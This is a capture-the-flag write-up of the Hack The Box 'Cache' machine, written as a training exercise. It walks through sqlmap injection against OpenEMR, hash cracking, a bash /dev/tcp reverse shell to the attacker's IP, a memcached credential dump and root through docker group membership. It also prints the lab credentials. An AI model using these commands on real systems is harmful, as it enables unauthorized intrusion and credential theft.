HackThebox Cache writeup

5
(7)

Introduction

Cache is the medium level machine from hack the box.

It involves directory enumeration followed by finding new site.Then exploiting openerm followed by getting creds with Memcached.Then a simple privilege escalation by docker

Lessons learned

1-Directory Emumeration
2-SQL injection 
3-Memcahed
4-Docker exploits

Steps involved

1-Port Scan
2-Website enumeration
3-Directory enumeration
4-Finding new project
5-Exploiting openERM
6-Exploiting memcached 
7-Privilage escalation via Docker 

Commands involved

1-nmap -sC -sV -O -v -oV 10.10.10.188
2-nano /etc/hosts
3-curl --cookie gimmepid.cookies http://localhost:8666/portal/add_edit_event_user.php\?eid\=\'
4-curl -v --cookie gimmepid.cookies http://localhost:8666/portal/add_edit_event_user.php\?eid\=1 2>&1 | grep "^>"
5-sqlmap -r request --threads=10 -D openemr -T users_secure --dump
6-sqlmap -r request --threads=10 -D openemr -T users_secure --dump
7-john -w=/root/Desktop/rockyou.txt hash.txt
8-python shell.py http://hms.htb -u openemr_admin -p xxxxxx -c 'bash -i >& /dev/tcp/10.10.14.173/1122 0>&1'
9-python3 -c 'import pty; pty.spawn("/bin/sh")'
10-bash -i
11-su ash
12-netstat -ano
13-telnet 127.0.01 11211
14-stats cachedump 1 0
15-get passwd
16-ssh luffy@10.10.10.188
17-id
18-docker images
19-docker run -v /:/mnt -it ubuntu 

Port Scan

Nmap 7.70 scan initiated Sun May 10 06:34:37 2020 as: nmap -sC -sV -O -v -oV 10.10.10.188
Increasing send delay for 10.10.10.188 from 0 to 5 due to 265 out of 881 dropped probes since last increase.
Nmap scan report for 10.10.10.188
Host is up (0.29s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a9:2d:b2:a0:c4:57:e7:7c:35:2d:45:4d:db:80:8c:f1 (RSA)
| 256 bc:e4:16:3d:2a:59:a1:3a:6a:09:28:dd:36:10:38:08 (ECDSA)
|_ 256 57:d5:47:ee:07:ca:3a:c0:fd:9b:a8:7f:6b:4c:9d:7c (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_ Supported Methods: OPTIONS HEAD GET POST
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Cache
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.70%E=4%D=5/10%OT=22%CT=1%CU=35467%PV=Y%DS=2%DC=I%G=Y%TM=5EB7D90
OS:8%P=x86_64-pc-linux-gnu)SEQ(SP=108%GCD=1%ISR=10A%TI=Z%CI=Z%II=I%TS=A)OPS
OS:(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST1
OS:1NW7%O6=M54DST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN
OS:(R=Y%DF=Y%T=40%W=FAF0%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)
Uptime guess: 25.559 days (since Tue Apr 14 17:10:48 2020)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done at Sun May 10 06:35:52 2020 -- 1 IP address (1 host up) scanned in 76.53 seconds

Website enumeration

As usual the first step is to look at the website .

The website as some pages like Home,news,contact us ,author and a login page.

HackThebox Cache writeup

Directory Enumeration

In the mean while let’s run a Directory enumeration tool.

HackThebox Cache writeup

On looking on the directories i found some creds for as in /jquery.

HackThebox Cache writeup

So now we have creds for ash and we have a login page so let’s login.

ash:H@v3_fun
HackThebox Cache writeup

But this seems like it is useless.So I move forward.

Finding new project

The author page gives us the hint of the ash new project .

It was a little guessing game here .

Taking hint from the author.html .I added hms.htb to my host file and it wotked.

HackThebox Cache writeup

nano /etc/hosts

HackThebox Cache writeup

So now we have openEMR.And it is a loging page here.

Exploiting OpenERM

HackThebox Cache writeup

After little enumeration i found many directories and files .But admin.php was useful as it showed the version of openerm.

HackThebox Cache writeup

I searched on google but the exploits were (authenticated) .So I need to get the creds first .

So after the help of HTB Discord community i came across one link which helped me to get the creds of openERM user creds .

https://atha.io/post/2019/08/how-i-got-2nd-place-in-my-first-ctf-ever/

It was SQL injection on the openERM so i followed it.

curl --cookie gimmepid.cookies http://localhost:8666/portal/add_edit_event_user.php\?eid\=\'
For more explanation visit the above link

Let’s now capture the request and use it with sqlmap

curl -v --cookie gimmepid.cookies http://localhost:8666/portal/add_edit_event_user.php\?eid\=1 2>&1 | grep "^>"
HackThebox Cache writeup

Now i just copied the get request for using sqlmap.

root@nagendra:~/Desktop/htb/cache# sqlmap -r request --threads=10 --tables

Table user_secure looks interesting .

HackThebox Cache writeup

So let’s dump it and see what is inside it.

root@nagendra:~/Desktop/htb/cache# sqlmap -r request --threads=10 -D openemr -T users_secure --dump
HackThebox Cache writeup

So now we have the hashes let’s crack it using the john the ripper tool.

HackThebox Cache writeup

I had already cracked it hence it is not cracking now.

openemr_admin:xxxxxx
These are the creds for openemr.And we know that there are exploits for it and now we have creds so now we can use those(Authenticated) exploits.

Here is the link of of exploit that i used.

https://www.exploit-db.com/exploits/45161
python shell.py http://hms.htb -u openemr_admin -p xxxxxx -c 'bash -i >& /dev/tcp/10.10.14.173/1122 0>&1'
HackThebox Cache writeup

And now we have the shell as www-data.

HackThebox Cache writeup

After a little enumeration i have that there are two users ash and luffy .

Moreover we have the creds for the ash user so let’s jump to ash user.

Inside the ash user we found the user flag .

HackThebox Cache writeup

Exploiting memcached

So i started enumerating .And saw that the port used locally was weird .127.0.0.1:11211

HackThebox Cache writeup

So let’s google about that port .

https://www.hackingarticles.in/penetration-testing-on-memcached-server/

So let’s connect to the memcached service on port 11211 through telnet .

HackThebox Cache writeup

Let’s get item.

HackThebox Cache writeup

Now we now for item in 1 and slab was in 0 so we dumped it .

HackThebox Cache writeup

Now we have the creds for luffy user So let’s use to login into ssh .

luffy:0n3_p1ec3
HackThebox Cache writeup

Privilage escalation via Docker





After login into luffy when checked for the id.It reveled that luffy was member of the Docker group which can be the path to root.

So i Searched for it on google and got a article.

https://www.hackingarticles.in/docker-privilege-escalation/
To run a docker instance first we need to get the images.
HackThebox Cache writeup

And we simply ran a docker instance and copied / to /mnt.

So now we cam read root flag and also the root hash .

HackThebox Cache writeup

How useful was this post?

Click on a star to rate it!

Average rating 5 / 5. Vote count: 7

No votes so far! Be the first to rate this post.

As you found this post useful...

Follow us on social media!

We are sorry that this post was not useful for you!

Let us improve this post!

Tell us how we can improve this post?

2 thoughts on “HackThebox Cache writeup”

Leave a Comment

X
wpChatIcon
0 Shares
Tweet
Share
Share
Pin